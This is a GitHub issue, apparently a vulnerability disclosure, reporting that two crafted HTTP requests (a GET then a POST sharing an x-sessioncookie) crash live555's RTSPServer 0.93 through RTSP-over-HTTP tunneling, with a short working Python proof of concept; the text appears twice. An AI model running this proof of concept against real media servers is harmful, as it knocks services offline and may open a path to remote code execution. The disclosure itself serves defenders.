You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported.
I only need to send two HTTP requests in one TCP connection.
The problem occurrs in RTSPServer.cpp:853 , it calls handleHTTPCmd_TunnelingPOST.
If I send a HTTP GET packet with a specific sessionCookie firstly, then I send a HTTP POST packet with this sessionCookie in the same TCP connection.
RTSPServer will call a error virtual function pointer in readSocket function(GroupsockHepler.cpp) and the pointer value comes from heap which may control.
Attack PoC python code:
from socket import *
target_ip = REMOTE_SERVER_IP
target_port = 554 # or 8554
tcp = socket(AF_INET,SOCK_STREAM)
tcp.connect((target_ip,target_port))
http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''
http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''
tcp.send(http_request_GET)
data = tcp.recv(1024)
tcp.send(http_request_POST)
tcp.close()
It will cause dos attack and potential remote command execution in version 0.93(I verified) , even all earlier versions (This is just my unverified guess).
The text was updated successfully, but these errors were encountered:
ISSUE DESCRIPTION
The project website : http://www.live555.com/liveMedia/
I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported.
I only need to send two HTTP requests in one TCP connection.
The problem occurrs in RTSPServer.cpp:853 , it calls handleHTTPCmd_TunnelingPOST.
If I send a HTTP GET packet with a specific sessionCookie firstly, then I send a HTTP POST packet with this sessionCookie in the same TCP connection.
RTSPServer will call a error virtual function pointer in readSocket function(GroupsockHepler.cpp) and the pointer value comes from heap which may control.
Attack PoC python code:
You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.
Original vulnerability discoverer:
许彬彬 Xubinbin
IMPACT
It will cause dos attack and potential remote command execution in version 0.93(I verified) , even all earlier versions (This is just my unverified guess).
The text was updated successfully, but these errors were encountered: